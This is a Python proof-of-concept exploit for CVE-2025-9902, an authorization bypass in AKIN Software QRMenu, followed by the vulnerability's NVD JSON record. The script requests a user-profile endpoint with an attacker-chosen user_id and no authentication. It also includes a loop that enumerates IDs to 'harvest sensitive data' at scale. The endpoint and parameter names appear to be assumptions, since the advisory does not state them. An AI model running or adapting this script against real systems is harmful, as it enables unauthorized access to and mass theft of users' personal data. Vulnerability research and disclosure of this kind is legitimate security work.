CVE-2025-9902

# CVE-2025-9902 PoC - QRMenu Authorization Bypass # Vulnerability: Authorization Bypass Through User-Controlled Key (CWE-639) # Target: AKIN Software QRMenu < Version dated 05.09.2025 import requests TARGET_URL = "https://target-qrmenu.com" # The vulnerable endpoint that accepts user-controlled key parameter VULNERABLE_ENDPOINT = "/api/v1/user/profile" # User-controlled parameter used for authorization (e.g., user_id) USER_ID_PARAM = "user_id" def exploit_authorization_bypass(target_user_id): """ Exploit authorization bypass by manipulating user-controlled key. The server fails to verify that the requesting user has permission to access the specified user's data. """ # Craft request with manipulated user_id parameter # No authentication required (PR:N) params = { USER_ID_PARAM: target_user_id, # Attacker controls this value "lang": "en" } headers = { "User-Agent": "Mozilla/5.0 (compatible; QRMenuExploit/1.0)", "Accept": "application/json" } try: response = requests.get( f"{TARGET_URL}{VULNERABLE_ENDPOINT}", params=params, headers=headers, timeout=10 ) if response.status_code == 200: print(f"[+] Successfully accessed data for user_id: {target_user_id}") print(f"[+] Response: {response.text}") return response.json() else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def enumerate_users(start_id=1, end_id=100): """ Enumerate valid user IDs to harvest sensitive data. Demonstrates mass exploitation capability. """ harvested_data = [] for user_id in range(start_id, end_id + 1): data = exploit_authorization_bypass(user_id) if data: harvested_data.append({"user_id": user_id, "data": data}) return harvested_data if __name__ == "__main__": # Example: Access admin user's data by manipulating user_id to 1 print("[*] Attempting authorization bypass on QRMenu...") result = exploit_authorization_bypass(1) if result: print("[!] Vulnerability confirmed - unauthorized data access successful")

{"cve": {"id": "CVE-2025-9902", "sourceIdentifier": "[email protected]", "published": "2025-10-13T13:15:32.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in AKIN Software Computer Import Export Industry and Trade Co. Ltd. QRMenu allows Privilege Abuse.This issue affects QRMenu: from 1.05.12 before Version dated 05.09.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0333", "source": "[email protected]"}]}}